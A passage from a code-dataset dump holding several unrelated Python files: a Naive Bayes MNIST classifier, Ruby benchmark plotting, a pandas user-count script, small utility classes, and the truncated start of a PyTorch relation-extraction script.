else:\n print(u\" > ERROR MIGRATING DRAFT {} - {}\".format(draft['id'], e.message))\n\n\nif __name__ == \"__main__\":\n arguments = docopt(__doc__)\n\n STAGE = arguments['']\n DRY_RUN = arguments['--dry-run']\n FRAMEWORK_SLUG = arguments['']\n\n api_url = get_api_endpoint_from_stage(STAGE)\n client = DataAPIClient(api_url, get_auth_token('api', STAGE))\n\n print(\"Finding suppliers...\")\n suppliers = find_suppliers_on_framework(client, FRAMEWORK_SLUG)\n print(\"Migrating drafts...\")\n for supplier in suppliers:\n print(u\"Migrating drafts for supplier {} - {}\".format(supplier['supplierId'], supplier['supplierName']))\n draft_services = get_submitted_drafts(client, FRAMEWORK_SLUG, supplier['supplierId'])\n\n for draft_service in draft_services:\n make_draft_service_live(client, draft_service, DRY_RUN)\n","sub_path":"scripts/publish-dos-draft-services.py","file_name":"publish-dos-draft-services.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"56127983","text":"import copy\r\nimport time\r\nimport math\r\nimport struct\r\n\r\n\"\"\" \r\n\r\n Pre-processing \r\n\r\n The following code will process the MNIST training and label \r\n files and store the data portined as training, validation and\r\n testing data each containing 60%, 20% and 20% of the MNIST data\r\n\r\n\"\"\"\r\n\r\n\r\nclass MNIST_Processing():\r\n # Initializing significant variables\r\n MNIST_TRAIN_FILE = 'data/mnist-train'\r\n MNIST_TRAIN_LABELS_FILE = 'data/mnist-train-labels'\r\n\r\n TRAINING_PERCENTAGE = 60\r\n VALIDATION_PERCENTAGE = 20\r\n TESTING_PERCENTAGE = 20\r\n\r\n training_list = []\r\n validation_list = []\r\n testing_list = []\r\n\r\n training_labels = []\r\n training_labels_vector = []\r\n validation_labels = []\r\n testing_labels = []\r\n\r\n #\r\n def __init__(self):\r\n self.read_data()\r\n self.read_labels()\r\n self.adapt_labels()\r\n\r\n def adapt_labels(self):\r\n label_list = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n\r\n for value in self.training_labels:\r\n label_list[value] = 1\r\n\r\n self.training_labels_vector.append(list(label_list))\r\n label_list[value] = 0\r\n\r\n # This retrieves and stores a list of vectors for the training, validation and testing list\r\n def read_data(self):\r\n image_file = open(self.MNIST_TRAIN_FILE, 'r+b')\r\n\r\n # Locates the beginning of the file and retrieves the \"magic number\"\r\n image_file.seek(0)\r\n\r\n magic_number = image_file.read(4)\r\n magic_number = struct.unpack('>i', magic_number)[0]\r\n\r\n # Records the number of images in the file\r\n num_images = image_file.read(4)\r\n num_images = struct.unpack('>i', num_images)[0]\r\n\r\n # Calculates requires size for the training, validation and testing data\r\n num_training = int(round((num_images * (self.TRAINING_PERCENTAGE / 100.0)), 0))\r\n num_validation = int(round((num_images * (self.VALIDATION_PERCENTAGE / 100.0)), 0))\r\n num_testing = int(round((num_images * (self.TESTING_PERCENTAGE / 100.0)), 0))\r\n\r\n print('Vectors in training: ' + str(num_training),\r\n '\\nVectors in validation: ' + str(num_validation),\r\n '\\nVectors in testing: ' + str(num_testing),\r\n '\\nTotal vectors: ' + str((num_training + num_validation + num_testing)),\r\n '\\n')\r\n\r\n # Records number of rows and columns\r\n rows = image_file.read(4)\r\n rows = struct.unpack('>i', rows)[0]\r\n\r\n columns = image_file.read(4)\r\n columns = struct.unpack('>i', columns)[0]\r\n\r\n # Initializes the training list\r\n print('Reading & parsing training data...')\r\n temp_training = image_file.read(rows * columns * num_training)\r\n self.training_list = self.normalizeFeatures(temp_training, rows, columns)\r\n\r\n print('Reading & parsing validation data...')\r\n temp_validation = image_file.read(rows * columns * num_validation)\r\n self.validation_list = self.normalizeFeatures(temp_validation, rows, columns)\r\n\r\n print('Reading & parsing testing data...\\n')\r\n temp_testing = image_file.read(rows * columns * num_testing)\r\n self.testing_list = self.normalizeFeatures(temp_testing, rows, columns)\r\n\r\n image_file.close()\r\n\r\n ### END OF read_data() ###\r\n\r\n #\r\n def read_labels(self):\r\n label_file = open(self.MNIST_TRAIN_LABELS_FILE, 'r+b')\r\n\r\n # Locates the beginning of the file and retrieves the \"magic number\"\r\n label_file.seek(0)\r\n\r\n magic_number = label_file.read(4)\r\n magic_number = struct.unpack('>i', magic_number)[0]\r\n\r\n # Records the number of labels in the file\r\n num_labels = label_file.read(4)\r\n num_labels = struct.unpack('>i', num_labels)[0]\r\n\r\n # Initializing the labels lists for the training, validation and testing data\r\n print('Reading & storing the labels...\\n')\r\n self.training_labels = list(label_file.read(len(self.training_list)))\r\n self.validation_labels = list(label_file.read(len(self.validation_list)))\r\n self.testing_labels = list(label_file.read(len(self.testing_list)))\r\n\r\n label_file.close()\r\n ### END OF read_labels() ###\r\n\r\n #\r\n\r\n # def normalize_features(self, feature, rows, columns):\r\n # feature = list(map(lambda x: 0 if x <100 else 1, feature))\r\n # return [feature[i: i + (rows * columns)] for i in range(0, len(feature), (rows * columns))]\r\n ### END OF normalize_featues() ###\r\n\r\n # Normalize features to a list\r\n def normalizeFeatures(self, feature, rows, columns, option='pixelsPerRow'):\r\n feature = list(map(lambda x: 0 if x < 10 else 1, feature)) # Normalize\r\n\r\n data = [feature[i:i + (rows * columns)] for i in range(0, len(feature), (rows * columns))]\r\n\r\n if (option == 'pixelsPerRow'):\r\n data = self.pixelsPerRowFeatExtraction(data)\r\n\r\n return data\r\n\r\n def pixelsPerRowFeatExtraction(self, data):\r\n totalData = []\r\n rowData = []\r\n row = 0\r\n for d in data:\r\n rowData = []\r\n for i in range(28):\r\n row = 0\r\n for j in range(28):\r\n if (d[i * 28 + j] == 1):\r\n row += 1\r\n rowData.append(row)\r\n totalData.append(rowData)\r\n return totalData\r\n\r\n\r\n\"\"\" END OF MNIST_Processing() CLASS \"\"\"\r\n\r\n\"\"\" \"\"\"\r\n\r\n\r\nclass MNIST_NaiveBayes():\r\n # Initializing significant variables\r\n class_prob = [0 for x in range(10)]\r\n pixel_prob = []\r\n\r\n training_list = []\r\n validation_list = []\r\n testing_list = []\r\n\r\n training_labels = []\r\n validation_labels = []\r\n testing_labels = []\r\n\r\n nb_training_labels = []\r\n nb_validation_labels = []\r\n nb_testing_labels = []\r\n\r\n collected_training_list = []\r\n collected_validation_list = []\r\n collected_testing_list = []\r\n\r\n #\r\n def __init__(self):\r\n # Initializes and prepares necessary components to run Bayes\r\n self.__initNB()\r\n start_train = time.process_time()\r\n self.train_bayes_v1()\r\n stop_train = time.process_time() - start_train\r\n\r\n self.display_stats()\r\n # The following runs the Bayes algoritm and records the predictions\r\n start_test = time.process_time()\r\n self.nb_training_labels = self.run_bayes(self.training_list)\r\n self.nb_validation_labels = self.run_bayes(self.validation_list)\r\n self.nb_testing_labels = self.run_bayes(self.testing_list)\r\n stop_test = time.process_time() - start_test\r\n\r\n # Displays accuracy results # Uncomment to display results\r\n self.test_accuracy('Training', self.nb_training_labels, self.training_labels)\r\n self.test_accuracy('Validation', self.nb_validation_labels, self.validation_labels)\r\n self.test_accuracy('Testing', self.nb_testing_labels, self.testing_labels)\r\n\r\n print('Training phase took: {0}'.format(stop_train))\r\n print('Testing phase took: {0}'.format(stop_test))\r\n # The following will display all vectors where the label matches the value passed\r\n # self.print_number(3)\r\n\r\n #\r\n def display_stats(self):\r\n if self.pixel_prob and self.class_prob:\r\n for index in range(len(self.class_prob)):\r\n print('Probability of class {0}: {1}'.format(index, self.class_prob[index]))\r\n\r\n print()\r\n\r\n \"\"\"\r\n for class_index in range(len(self.pixel_prob)):\r\n print('Class {0} contains the following pixel probability:'.format(class_index))\r\n\r\n output_string = ''\r\n\r\n for index in range(len(self.pixel_prob[class_index])):\r\n output_string += '{:.6f} '.format((self.pixel_prob[class_index][index] * 100))\r\n\r\n if index % 28 == 0:\r\n print(output_string)\r\n output_string = ''\r\n \"\"\"\r\n\r\n ### END OF display_stats() ###\r\n\r\n # The following will remove empty columns from each vector and tabulate\r\n # the different sizes generated. An empty column in this domain is\r\n # defined as a full column height of consecutive non-black pixels who belong to\r\n # a unique vertical line in the vector.\r\n ### NOTE: By design this method should be ran after collect_vector_height_data()\r\n ### method is ran at least once\r\n def collect_vector_width_data(self):\r\n if not self.collected_training_list or not self.collected_validation_list or not self.collected_testing_list:\r\n print('Missing data to process, now configuring...')\r\n self.collect_vector_height_data()\r\n\r\n #\r\n print('Processing vector width...')\r\n\r\n process_list = [self.collected_training_list, self.collected_validation_list, self.collected_testing_list]\r\n progress_index = 0\r\n\r\n for list in process_list:\r\n for vector in list:\r\n empty_column = True\r\n empty_index = []\r\n\r\n height = int(len(vector) / 28)\r\n\r\n new_vector = copy.deepcopy(vector)\r\n\r\n for x in range(28):\r\n for y in range(x, len(vector), 28):\r\n if new_vector[y] == 1:\r\n empty_column = False\r\n\r\n #\r\n if y > len(vector) - 28 and empty_column == True:\r\n empty_index.insert(0, x)\r\n elif y > len(vector) - 28 and empty_column == False:\r\n empty_column = True\r\n\r\n print(empty_index)\r\n\r\n index_to_remove = copy.deepcopy(empty_index)\r\n\r\n for x in empty_index:\r\n for y in range(height):\r\n if x * y not in index_to_remove:\r\n index_to_remove.append(x * y)\r\n\r\n index_to_remove = sorted(index_to_remove, reverse=True)\r\n\r\n for x in index_to_remove:\r\n width = int(math.sqrt(len(new_vector)))\r\n\r\n if width % 22 != 0:\r\n del new_vector[x]\r\n\r\n print(len(new_vector))\r\n\r\n return\r\n\r\n # The following will remove empty rows from each vector and tabulate\r\n # the different sizes generated. An empty column in this domain is\r\n # defined as a 28 consecutive non-black pixels who belong to\r\n # a unique horizontal line in the vector.\r\n def collect_vector_height_data(self):\r\n # The following ensures the process does not run without data\r\n if not self.training_list or not self.validation_list or not self.testing_list:\r\n print('Missing data to process, now configuring...')\r\n self.__initNB()\r\n\r\n # The following creates list\r\n print('Processing vector height...')\r\n\r\n process_list = [self.training_list, self.validation_list, self.testing_list]\r\n process_index = 0\r\n\r\n for list in process_list:\r\n for vector in list:\r\n empty_row = True\r\n empty_index = []\r\n\r\n new_vector = copy.deepcopy(vector)\r\n\r\n for x in range(len(new_vector)):\r\n if new_vector[x] == 1:\r\n empty_row = False\r\n\r\n # The following checks for empty lines above and bellow each vector\r\n if x != 0 and x % 28 == 0 and empty_row == True:\r\n empty_index.insert(0, x)\r\n elif x % 28 == 0 and empty_row == False:\r\n empty_row = True\r\n\r\n for index in empty_index:\r\n height = int(len(new_vector) / 28)\r\n\r\n if height % 22 != 0:\r\n del new_vector[index - 28: index]\r\n\r\n if process_index == 0:\r\n self.collected_training_list.append(new_vector)\r\n elif process_index == 1:\r\n self.collected_validation_list.append(new_vector)\r\n elif process_index == 2:\r\n self.collected_testing_list.append(new_vector)\r\n\r\n process_index += 1\r\n\r\n # The following will tabulate and display the different heights of the new vectors created\r\n \"\"\"\r\n print('Processing new vector lengths...\\n')\r\n collected_list = [self.collected_training_list, self.collected_validation_list, self.collected_testing_list]\r\n\r\n collected_lengths = [0 for x in range(29)]\r\n\r\n for list in collected_list:\r\n for vector in list:\r\n height = int(len(vector) / 28)\r\n collected_lengths[height] += 1\r\n\r\n if height < 12:\r\n output = ''\r\n\r\n for x in range(len(vector)):\r\n if vector[x] != 0:\r\n output += '.'\r\n else:\r\n output += ' '\r\n\r\n if x % 28 == 0 and x != 0:\r\n print(output)\r\n output = ''\r\n\r\n print()\r\n\r\n\r\n for x in range(len(collected_lengths)):\r\n if collected_lengths[x] != 0:\r\n print(\"Height: \" + str(x) + \"\\tfound: \" + str(collected_lengths[x]))\r\n ## \"\"\"\r\n\r\n ### END OF collect_vector_data() ###\r\n\r\n #\r\n def __initNB(self):\r\n self.MNIST_OBJECT = MNIST_Processing()\r\n\r\n self.training_list = self.MNIST_OBJECT.training_list\r\n self.validation_list = self.MNIST_OBJECT.validation_list\r\n self.testing_list = self.MNIST_OBJECT.testing_list\r\n\r\n self.training_labels = self.MNIST_OBJECT.training_labels\r\n self.validation_labels = self.MNIST_OBJECT.validation_labels\r\n self.testing_labels = self.MNIST_OBJECT.testing_labels\r\n\r\n ### END OF __initNB() ###\r\n\r\n # The following is an implementation of Naive Bayes proccessing a probability\r\n # for each individual pixel in an image.\r\n def train_bayes_v1(self):\r\n # The following ensure data is present to process\r\n if not self.training_list or not self.validation_list or not self.testing_list:\r\n print('Missing data to process, now configuring...')\r\n self.__initNB()\r\n\r\n #\r\n print('Training Naive Bayes algorithm with training list...\\n')\r\n self.pixel_prob = [[0 for x in range(len(self.training_list[0]))] for y in range(10)]\r\n\r\n # Essential variables\r\n class_occ = [0 for x in range(10)]\r\n pixel_occ_per_class = [[0 for x in range(len(self.training_list[0]))] for y in range(10)]\r\n pixel_per_class = [0 for x in range(10)]\r\n num_occ = 0\r\n\r\n # The following records the number of pixels present and their independent occurances\r\n for x in range(len(self.training_list)):\r\n class_occ[self.training_labels[x]] += 1\r\n\r\n for y in range(len(self.training_list[x])):\r\n if self.training_list[x][y] == 1:\r\n pixel_occ_per_class[self.training_labels[x]][y] += 1\r\n pixel_per_class[self.training_labels[x]] += 1\r\n\r\n # The following creates a list of probability for each pixel in each class\r\n for x in range(len(pixel_occ_per_class)):\r\n for y in range(len(pixel_occ_per_class[x])):\r\n self.pixel_prob[x][y] = float(\r\n (pixel_occ_per_class[x][y] + 1) / (pixel_per_class[x] + len(self.training_list[0])))\r\n\r\n for value in class_occ:\r\n num_occ += value\r\n\r\n for x in range(len(class_occ)):\r\n self.class_prob[x] = float(class_occ[x] / num_occ)\r\n\r\n ### END OF training_bayes_v1() ###\r\n\r\n #\r\n def run_bayes(self, list_to_test):\r\n output_labels = []\r\n\r\n for vector in list_to_test:\r\n score = [math.log10(x) for x in self.class_prob]\r\n\r\n for x in range(len(vector)):\r\n if vector[x] == 1:\r\n for y in range(len(score)):\r\n score[y] += math.log10(self.pixel_prob[y][x])\r\n\r\n output_labels.append(score.index(max(score)))\r\n\r\n return output_labels\r\n\r\n ### END OF run_bayes() ###\r\n\r\n #\r\n def test_accuracy(self, list_name, nm_labels, labels):\r\n correct = 0\r\n incorrect = 0\r\n accuracy = 0.0\r\n\r\n for x in nm_labels:\r\n if nm_labels[x] == labels[x]:\r\n correct += 1\r\n else:\r\n incorrect += 1\r\n\r\n accuracy = int((correct / (correct + incorrect)) * 100)\r\n print(list_name + ' results: ')\r\n print('Correct: ' + str(correct),\r\n '\\nIncorrect: ' + str(incorrect),\r\n '\\nAccuracy: ' + str(accuracy) + '\\n')\r\n\r\n ### END OF test_accuracy() ###\r\n\r\n #\r\n def print_number(self, num_to_display):\r\n for x in range(len(self.collected_training_list)):\r\n if self.training_labels[x] == num_to_display:\r\n\r\n print('Index: ' + str(x))\r\n output = ''\r\n\r\n for y in range(len(self.collected_training_list[x])):\r\n if self.collected_training_list[x][y] == 1:\r\n output += str(num_to_display)\r\n else:\r\n output += '-'\r\n\r\n if y % 28 == 0 and y != 0:\r\n print(output)\r\n output = ''\r\n\r\n print('\\n')\r\n ### END OF print_number() ###\r\n\r\n\r\n\"\"\" END OF MNIST_NaiveBayes() CLASS \"\"\"\r\n\r\nnaive_classifier = MNIST_NaiveBayes()\r\n\r\n","sub_path":"NaiveBayesMNISTV28.py","file_name":"NaiveBayesMNISTV28.py","file_ext":"py","file_size_in_byte":17707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"279693584","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 13 19:38:43 2014\n\n@author: henrik\n\"\"\"\n\n\nclass MarkerPose:\n def __init__(self, x, y, theta, quality, order = None):\n self.x = x\n self.y = y\n self.theta = theta\n self.quality = quality\n self.order = order\n\n def scale_position(self, scale_factor):\n self.x = self.x * scale_factor\n self.y = self.y * scale_factor\n\n\n","sub_path":"MarkerPose.py","file_name":"MarkerPose.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"467282535","text":"import csv\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom operator import itemgetter\n\nNOVERSION = None\nNOJUMP = -10\nTRIPLEPERFO = 18.69 * 3\ncrubyMeans = []\ncrubyStdDevs = []\ncrubyVersions = []\ncrubyVersionsLine = []\ncrubyVersionsLineX = []\ncrubyVersionsX = []\ncrubyJumps = []\n\nnewLineX = []\nnewLine = []\nnewLineV = []\n\nsortedCrubyJumps = []\njrubyMeans = []\njrubyStdDevs = []\njrubyVersions = []\njrubyJumps = []\nsortedJrubyJumps = []\n\nfor file in ['cruby_results2.csv', 'jruby_results_flags2.csv']:\n\n\twith open(file) as f:\n\n\t\tif file == 'cruby_results2.csv' :\n\t\t\treader = reversed(list(csv.reader(f, delimiter=',')))\n\t\telse :\n\t\t\treader = csv.reader(f, delimiter=',')\n\n\t\tif file == 'jruby_results_flags2.csv' :\n\t\t\t#try:\n\t\t\t#\treader = sorted(reader, key = lambda s: list(map(int, str(s[1])[6:].split('.'))))\n\t\t\t#except ValueError:\n\t\t\t#\tprint(\"x\")\n\t\t\t#\treader = sorted(reader, key = lambda s: list(map(int, str(s[1])[6:].split('.'))))\n\t\t\treader = sorted(reader, key = lambda s: list(map(int, ((str((s[1].split('-'))[1])).split('.'))[:3])))\n\t\t\n\t\tind = 0\n\t\tmax = 7\n\t\tmin = 2\n\t\tlocalMaxVersion = 0\n\t\tif file == 'cruby_results2_date.csv' :\n\t\t\tmax = 8\n\t\t\tmin = 3\n\n\t\tfor row in reader:\n\t\t\tind+=1\n\t\t\tif len(row) == max:\n\t\t\t\ttimes = []\n\t\t\t\tfor i in range(min, max):\n\t\t\t\t\ttimeString = row[i].split(\" \")[1]\n\t\t\t\t\ttimes.append(float(timeString))\n\n\t\t\t\t#Basic stats calculation\n\t\t\t\tif row[0] == \"cruby\":\n\t\t\t\t\tcrubyMeans.append(np.mean(times))\n\t\t\t\t\tcrubyStdDevs.append(np.std(times))\n\t\t\t\t\tcrubyVersions.append(row[1][5:])\n\t\t\t\t\t\n\t\t\t\t\tcrubyVersionsLine.append(np.mean(times))\n\t\t\t\t\tif file == 'cruby_results2_date.csv' :\n\t\t\t\t\t\tcrubyVersionsLineX.append(int(row[2]))\n\t\t\t\t\t\tcrubyVersionsX.append(int(row[2]))\n\t\t\t\t\t\tif int(row[1][7]) >= localMaxVersion:\n\t\t\t\t\t\t\tlocalMaxVersion = int(row[1][7])\n\t\t\t\t\t\t\tnewLineX.append(int(row[2]))\n\t\t\t\t\t\t\tnewLine.append(np.mean(times))\n\t\t\t\t\t\t\tnewLineV.append(row[1])\n\t\t\t\t\telse :\n\t\t\t\t\t\tcrubyVersionsLineX.append(ind)\n\t\t\t\t\t\tif int(row[1][7]) > 2 or (int(row[1][7]) == 2 and int(row[1][9]) >= 6) or (int(row[1][7]) == 2 and len(row[1]) == 11) :\n\t\t\t\t\t\t\tnewLineX.append(ind-1)\n\t\t\t\t\t\t\tnewLine.append(np.mean(times))\n\t\t\t\t\t\t\tnewLineV.append(row[1])\n\n\t\t\t\telse:\n\t\t\t\t\tjrubyMeans.append(np.mean(times))\n\t\t\t\t\tjrubyStdDevs.append(np.std(times))\n\t\t\t\t\tjrubyVersions.append(row[1])\n\t\t\t\ttimes.clear\n\t\t\telse:\n\t\t\t\tif row[0] == \"cruby\":\n\t\t\t\t\tcrubyMeans.append(NOVERSION)\n\t\t\t\t\tcrubyStdDevs.append(NOVERSION)\n\t\t\t\t\tcrubyVersions.append(row[1][5:])\n\t\t\t\t\tif file == 'cruby_results2_date.csv' :\n\t\t\t\t\t\tcrubyVersionsX.append(int(row[2]))\n\t\t\t\telse:\n\t\t\t\t\tjrubyMeans.append(NOVERSION)\n\t\t\t\t\tjrubyStdDevs.append(NOVERSION)\n\t\t\t\t\tjrubyVersions.append(\"x\")\n\n#Get Jump Values\ncrubyJumps.append(NOJUMP)\nfor i in range(1, len(crubyMeans)) :\n\tif (crubyMeans[i] != NOVERSION and crubyMeans[i-1] != NOVERSION) :\n\t\tcrubyJumps.append(crubyMeans[i] - crubyMeans[i-1])\n\t\t#if crubyMeans[i] < crubyMeans[i-1] :\n\t\t\t#print(\"Version {}, value: {}\".format(crubyVersions[len(crubyJumps)-1], crubyMeans[i] - crubyMeans[i-1]))\n\telse : \n\t\tcrubyJumps.append(NOJUMP)\n\n#Finding max jump versions\nprint(\"cRuby:\")\nsortedCrubyJumps = crubyJumps.copy()\nsortedCrubyJumps.sort()\nfor i in range(0, 10) :\n\tjumpVal = sortedCrubyJumps[i]\n\tprint(jumpVal, end=', ')\n\tprint(crubyVersions[crubyJumps.index(jumpVal)])\n\n\n#Linear INterpolation\n#xValsCruby = []\n\n#for i in range(0, len(crubyVersions)) :\n#\txValsCruby.append(i)\n\n#true if dates\nif True :\n\tm, b = np.polyfit(newLineX, newLine, 1)\nelse:\n\tm, b = np.polyfit(crubyVersionsLineX, crubyVersionsLine, 1)\n\ncrubyLine = []\n\nfor i in crubyVersionsLineX :\n\tcrubyLine.append(m*i + b)\n\n#When to reach triple performance?\n\n\n\ngoalVersion = (73.05055-b)/m\n#goalVersion = (2*b)/m\nprint(\"formula is y={}x + {}\".format(m, b))\nprint(\"We wil reach 3x3 goal at version {}.\".format(goalVersion))\nprint(\"This is in {} versions.\".format(goalVersion-crubyVersionsLineX[len(crubyVersionsLineX)-1]))\nprint()\n\n#All manipulations done\nCST=6\n\ncrubyX = [int(i)*CST for i in np.arange(0, len(crubyVersions)/CST)]\ncrubyVersionsPlot = (itemgetter(*crubyX)(crubyVersions))\n\nallXs = [i for i in range(2131)]\n\nplt.figure(figsize=(10, 7.6))\nplt.plot(crubyMeans, 'ro', markersize=12) #NODATE\n#plt.plot(crubyVersionsX, crubyMeans, 'ro', markersize=12) #DATE\n#plt.plot(newLineX, newLine, 'go', markersize=12, markeredgewidth=2, markeredgecolor='g') #MAYBE\nplt.plot(crubyVersionsLineX, crubyLine, linewidth=6, alpha=0)\nplt.yticks(fontsize=17)\nplt.xticks(fontsize=17)\nplt.xticks(rotation=45, ha='right', fontsize=17) #NODATE\nplt.xticks(crubyX, crubyVersionsPlot) #NODATE\n#plt.xlabel(\"Time Since Original Version (days)\", fontsize=24) #DATE\nplt.xlabel(\"cRuby Versions\", fontsize=24) #NODATE\nplt.ylabel(\"Performance (fps)\", fontsize=24)\n#plt.title()\nplt.ylim(bottom=21)\nplt.tight_layout()\nplt.savefig(\"figRubyMeans.png\")\nplt.show()\nplt.clf()\n\nplt.plot(crubyStdDevs, 'ro')\nplt.xticks(rotation=90)\nplt.xticks(crubyX, crubyVersionsPlot)\nplt.savefig(\"figRubyStdDevs.png\")\nplt.clf()\n\nplt.plot(crubyJumps, 'ro')\nplt.xticks(rotation=90)\nplt.xticks(crubyX, crubyVersionsPlot)\nplt.savefig(\"figRubyJumps.png\")\nplt.clf()\n\njrubyX = [int(i)*CST for i in np.arange(0, len(jrubyVersions)/CST)]\njrubyVersionsPlot = itemgetter(*jrubyX)(jrubyVersions)\n\nplt.plot(jrubyMeans, 'ro')\nplt.xticks(rotation=30)\nplt.xticks(jrubyX, jrubyVersionsPlot)\nplt.savefig(\"figJrubyMeans.png\")\nplt.clf()\n\nplt.plot(jrubyStdDevs, 'ro')\nplt.xticks(rotation=90)\nplt.xticks(jrubyX, jrubyVersionsPlot)\nplt.savefig(\"figJrubyStdDevs.png\")\nplt.clf()\n\nplt.plot(jrubyJumps, 'ro')\nplt.xticks(rotation=90)\nplt.xticks(jrubyX, jrubyVersionsPlot)\nplt.savefig(\"figJrubyJumps.png\")\nplt.clf()\n\t","sub_path":"statsC.py","file_name":"statsC.py","file_ext":"py","file_size_in_byte":5592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"108484524","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# !/usr/bin/env python\n# coding: utf-8\n\n\n\n\nfrom pandas import DataFrame, Series\nfrom tools.con_mysql import create_con\n\n# import pymysql\nimport pandas as pd\n\n\ncon = create_con()\nsql = \"select * from dd_user\"\ndf = pd.read_sql(sql, con)\n\n\n\n\n\nimport time\ndef change_time(t):\n timeStamp = t\n timeArray = time.localtime(timeStamp)\n otherStyleTime = time.strftime(\"%Y-%m-%d %H:%M:%S\", timeArray)\n return otherStyleTime\n\n\n# 在这一步改变了df表中的原数据\ndf['join_time'] = Series([change_time(x) for x in df['join_time']])\n\n# 创建了一个新的Serias\ndt = pd.to_datetime(df['join_time'])\n\n\n\ndf2 = DataFrame(df['id'])\ndf2.set_index(dt)\ndf2.insert(0, 'date', dt)\ndf3 = df2.set_index(df2['date'])\ndf4 = df3.drop(['date'], axis=1)\ndf4['2018-08'].groupby('id')\n\n\ns = pd.Series(df4['id'], index=df4.index)\n# print(type(s))\nprint(s.head(2))\n\n#此处的s可以通过日期来进行筛选需要的时间段,日,月访问数据\ns['2018-08-13 00'].count() # '2018-08-13 00'的新增人数\n\n\n# 画取当日新增用户数\ndef draw_trend_hour(stime):\n x = []\n y = []\n for i in range(24):\n st = \"%02d\" % i\n x.append(st)\n ss = stime+' ' + st\n y.append(s[ss].count())\n return (x,y)\n\n# 画取七日新增用户数\ndef draw_trend_weeks(stime):\n x = []\n y = []\n for i in range(29-7,29):\n st = \"%02d\" % i\n x.append(st)\n ss = stime+'-' + st\n y.append(s[ss].count())\n return (x,y)\n\nstime = '2018-8-13'\n\nx,y = draw_trend_hour(stime)\ny_sum = sum(y)\n# x1,y1 = draw_trend_weeks(stime)\n\n\nfrom tools.con_mysql import judge_new_user\nfrom tools.my_sql import insert_new_user\nsql = insert_new_user(y, stime, y_sum)\n\n\n\njudge_new_user(stime, sql)\n\n\n# from tools.draw_chart import draw_new_days\n# # draw_new_days(x,y)","sub_path":"novel_analysis/new_user_trend.py","file_name":"new_user_trend.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"373616052","text":"items = [\n ('product 1', 46),\n ('product 2', 12),\n ('product 3', 34),\n ('product 4', 9),\n]\n\n# items.sort(key=lambda item: item[1])\n# print(items)\n\n# filtered = list(filter(lambda item: item[1] >= 14, items))\n# print(filtered)\n\n# comprehension: [expression for item in items]\nprices = [item for item in items if item[1] >= 14]\nprint(prices)\n","sub_path":"Mosh Python Course/Hello world/Lambda_function.py","file_name":"Lambda_function.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"424474639","text":"#!/usr/bin/python3\n\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\n\nimport torch\nimport torch.optim as optim\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torch.nn as nn\nfrom collections import defaultdict\nimport time\nimport argparse\n\nfrom LoadDataVariables import *\nfrom maxLen import maxLen\nfrom prf import prf\n\npositinoVecLen = 10\nbatchSize = 200\nwordVectorLength = 100\nvectorLength = wordVectorLength + 2 * positinoVecLen\nhopNumber = 2\nclassNumber = 2\nnum_epoches = 200\nhiddenSize = 200\nentityVecSize = 100\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--fold\", default=\"1\")\nargs = parser.parse_args()\nfoldN = args.fold\n\nresultOutput = '/home/laboratory/lab/BioCreative/2017/BC6/GRU_mulInstace/'\nif not os.path.exists(resultOutput):\n os.makedirs(resultOutput)\n\nprint(\"Load word id...\")\nword2id = LoadWord2id(\"/home/laboratory/corpus/en_vectorTable/bio-word2id100\")\nprint(\"Load word vectors...\")\nten = np.loadtxt(\"/home/laboratory/corpus/en_vectorTable/bio-embed100\")\nembed = nn.Embedding(ten.shape[0], wordVectorLength)\nembed.weight = torch.nn.Parameter(torch.FloatTensor(ten), requires_grad=True)\n\nprint(\"Load entity vectors...\")\nentity2vector = np.loadtxt(\"/home/laboratory/lab/BioCreative/codePlayer/Fast-TransX/transE/output/100d/entity2vec.vec.new\")\nentityEmbed = nn.Embedding(entity2vector.shape[0], entity2vector.shape[1])\nentityEmbed.weight = torch.nn.Parameter(torch.FloatTensor(entity2vector), requires_grad=True)\n\nprint(\"Load relation vectors...\")\n#relation2vector = LoadRelationVectors(\"/home/laboratory/lab/BioCreative/codePlayer/Fast-TransX/transE/output/100d/relation2vec.vec\", wordVectorLength)\nrelation2vector = np.loadtxt(\"/home/laboratory/lab/BioCreative/codePlayer/Fast-TransX/transE/output/100d/relation2vec.vec\")\nrelationEmbed = nn.Embedding(relation2vector.shape[0], relation2vector.shape[1])\nrelationEmbed.weight = torch.nn.Parameter(torch.FloatTensor(relation2vector), requires_grad=True)\n\nprint(\"Load triples...\") \ntriples = LoadTriples(\"/home/laboratory/lab/BioCreative/codePlayer/Fast-TransX/data/triple2id.txt\")\nprint(\"Load entity id mapping...\")\nentity2id = LoadEntity2Id(\"/home/laboratory/lab/BioCreative/codePlayer/Fast-TransX/data/entity2id.txt.new\")\n\ntrainPath = \"/home/laboratory/lab/BioCreative/2017/BC6/corpus_train\"+foldN+\".txt.mulInstance\"\ntestsPath = \"/home/laboratory/lab/BioCreative/2017/BC6/corpus_test\"+foldN+\".txt.mulInstance\"\nprint(\"Load train samples...\")\ntrainSet = LoadMulInstanceSamples(trainPath)\nprint(\"Load test samples...\")\ntestSet = LoadMulInstanceSamples(testsPath)\n\nmaxlen = max([maxLen(trainPath), maxLen(testsPath)])\npositionVar = nn.Embedding(maxlen * 2, positinoVecLen)\n\n# conv1 = nn.Conv2d(1, 1, (1, 3), stride=1, padding=(0, 1), bias=True)\n# conv2 = nn.Conv2d(1, 1, (1, 4), stride=1, padding=(0, 1), bias=True)\n# conv3 = nn.Conv2d(1, 1, (1, 5), stride=1, padding=(0, 2), bias=True)\nWr = Variable(torch.FloatTensor(np.random.uniform(-0.1, 